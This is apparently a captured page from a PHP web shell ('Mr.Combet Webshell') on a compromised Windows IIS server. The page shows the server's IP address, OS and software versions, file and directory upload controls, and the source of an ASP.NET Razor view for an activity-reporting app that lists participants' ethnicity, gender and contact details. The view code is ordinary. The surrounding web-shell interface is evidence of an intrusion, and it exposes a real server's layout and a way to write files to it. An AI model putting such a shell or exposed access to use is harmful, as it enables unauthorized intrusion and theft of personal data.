Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
inetpub
/
wwwroot
/
map
/
Views
/
ActivityReporting
/
View File Name :
Details.cshtml
@model RER_Project.DataAccess.ViewModels.Activity.ActivityReportingViewModel <div class="wrapper wrapper-content animated fadeInRight"> <div class="row"> <div class="col-lg-12"> <div class="ibox-content"> <h3>Activity/Event Details</h3> <hr /> <div class="row"> <div class="col-lg-4"> <span style="font-size:medium">Fiscal Year : <strong> @Model.ActivityReportingView.FiscalYear</strong></span> </div> <div class="col-lg-4"> <span style="font-size:medium">Start Date : <strong> @Convert.ToDateTime(Model.ActivityReportingView.StartDate).ToShortDateString()</strong></span> </div> <div class="col-lg-4"> <span style="font-size:medium">End Date : <strong> @Convert.ToDateTime(Model.ActivityReportingView.EndDate).ToShortDateString()</strong></span> </div> </div> <br /> <div class="row"> <div class="col-lg-4"> <span style="font-size:medium">Activity Name : <strong> @Model.ActivityReportingView.ActivityName</strong></span> </div> <div class="col-lg-4"> <span style="font-size:medium">Commodity : <strong> @Model.ActivityReportingView.Commodity</strong></span> </div> <div class="col-lg-4"> <span style="font-size:medium">Planned Budget : <strong> Rs. @Model.ActivityReportingView.PlannedBudget.ToString("#,##0.##")</strong></span> </div> </div> <br /> <div class="row"> <div class="col-lg-4"> <span style="font-size:medium">Actual Expense : <strong> Rs. @Model.ActivityReportingView.ActualExpense.ToString("#,##0.##")</strong></span> </div> <div class="col-lg-4"> <span style="font-size:medium">Province : <strong> @Model.ActivityReportingView.Province</strong></span> </div> <div class="col-lg-4"> <span style="font-size:medium">District : <strong> @Model.ActivityReportingView.District</strong></span> </div> </div> <br /> <div class="row"> <div class="col-lg-4"> <span style="font-size:medium">Municipality : <strong> @Model.ActivityReportingView.Municipality</strong></span> </div> <div class="col-lg-4"> <span style="font-size:medium">InCoordinationOf : <strong> @Model.ActivityReportingView.InCoordinationOf</strong></span> </div> <div class="col-lg-4"> <span style="font-size:medium">Facilitator : <strong> @Model.ActivityReportingView.Facilitator</strong></span> </div> </div> <br /> <div class="row"> <div class="col-lg-4"> <span style="font-size:medium">Objectives : @Model.ActivityReportingView.Objectives</span> </div> <div class="col-lg-4"> <span style="font-size:medium">DetailsOfActivity : @Model.ActivityReportingView.DetailsOfActivity</span> </div> <div class="col-lg-4"> <span style="font-size:medium">Output : @Model.ActivityReportingView.Output</span> </div> </div> <br /> <div class="row"> <div class="col-lg-4"> <span style="font-size:medium">Issues Identified : @Model.ActivityReportingView.IssuesIdentified</span> </div> <div class="col-lg-4"> <span style="font-size:medium">Recommendation : @Model.ActivityReportingView.Recommendation</span> </div> </div> <br /> <br /><br /> <div class="table-responsive" style="margin-top: 16px;"> <h4 style="background-color: #e9e9e9; padding: 8px 8px;">Activity Participants</h4> <h5>Member Participants</h5> <table class="footable table table-hover"> <thead> <tr> <th>Group</th> <th>Member Name </th> <th>Age</th> <th>Ethnicity</th> <th>Gender</th> <th>Contact</th> <th>Origin</th> </tr> </thead> <tbody> @if (Model.ActivityParticipantViewList.Count() > 0) { foreach (var item in Model.ActivityParticipantViewList) { <tr> <td> @if (item.GroupId != 0) { @item.GroupName } else { <span>Has No Group</span> } </td> <td> @if (item.GroupId != 0) { @String.Concat(item.FirstName, ' ', item.LastName) } else { <span>@item.MemberName</span> } </td> <td>@item.Age</td> <td>@item.Ethnicity</td> <td>@item.Gender</td> <td>@item.ContactNo</td> <td>@item.Origin</td> </tr> } } else { <tr> <td align="center" colspan="7">No Records Found</td> </tr> } </tbody> </table> </div> <div class="table-responsive" style="margin-top: 16px;"> <h4 style="background-color: #e9e9e9; padding: 8px 8px;">Member Participants Details(Disaggregated Data)</h4> <table class="footable table table-bordered table-hover"> <thead> <tr> <th style="text-align:center">Total Participants</th> <th colspan="4" style="text-align:center">Dalit</th> <th colspan="4" style="text-align:center">Janajati</th> <th colspan="4" style="text-align:center">Others</th> <th colspan="4" style="text-align:center">Madhesi Eco Class2</th> <th colspan="4" style="text-align:center">Muslim</th> <th colspan="2" style="text-align:center">Total</th> </tr> <tr> <th></th> <th colspan="2" style="text-align:center">Hill</th> <th colspan="2" style="text-align:center">Terai</th> <th colspan="2" style="text-align:center">Hill</th> <th colspan="2" style="text-align:center">Terai</th> <th colspan="2" style="text-align:center">Hill</th> <th colspan="2" style="text-align:center">Terai</th> <th colspan="2" style="text-align:center">Hill</th> <th colspan="2" style="text-align:center">Terai</th> <th colspan="2" style="text-align:center">Hill</th> <th colspan="2" style="text-align:center">Terai</th> <th colspan="2" style="text-align:center"></th> </tr> <tr> <th></th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> <th rowspan="2" style="text-align:center">Male</th> <th rowspan="2" style="text-align:center">Female</th> </tr> </thead> <tbody> @if (Model.ActivityParticipantDetailViewList.Count() > 0) { foreach (var item in Model.ActivityParticipantDetailViewList) { <tr> <td>@item.MigrationStatus</td> <td>@item.HillDalitMale</td> <td>@item.HillDalitFemale</td> <td>@item.TeraiDalitMale</td> <td>@item.TeraiDalitFemale</td> <td>@item.HillJanjatiMale</td> <td>@item.HillJanjatiFemale</td> <td>@item.TeraiJanjatiMale</td> <td>@item.TeraiJanjatiFemale</td> <td>@item.HillOthersMale</td> <td>@item.HillOthersFemale</td> <td>@item.TeraiOthersMale</td> <td>@item.TeraiOthersFemale</td> <td>@item.HillMadhesMale</td> <td>@item.HillMadhesFemale</td> <td>@item.TeraiMadhesMale</td> <td>@item.TeraiMadhesFemale</td> <td>@item.HillMuslimMale</td> <td>@item.HillMuslimFemale</td> <td>@item.TeraiMuslimMale</td> <td>@item.TeraiMuslimFemale</td> <td>@item.TotalMale</td> <td>@item.TotalFemale</td> </tr> } } else { <tr> <td align="center" colspan="7">No Records Found</td> </tr> } </tbody> </table> </div> <div class="row"> <div class="pull-right"> <a href="/activityreporting/reporting" class="btn btn-default btn-sm">Back</a> </div> </div> </div> </div> </div> </div>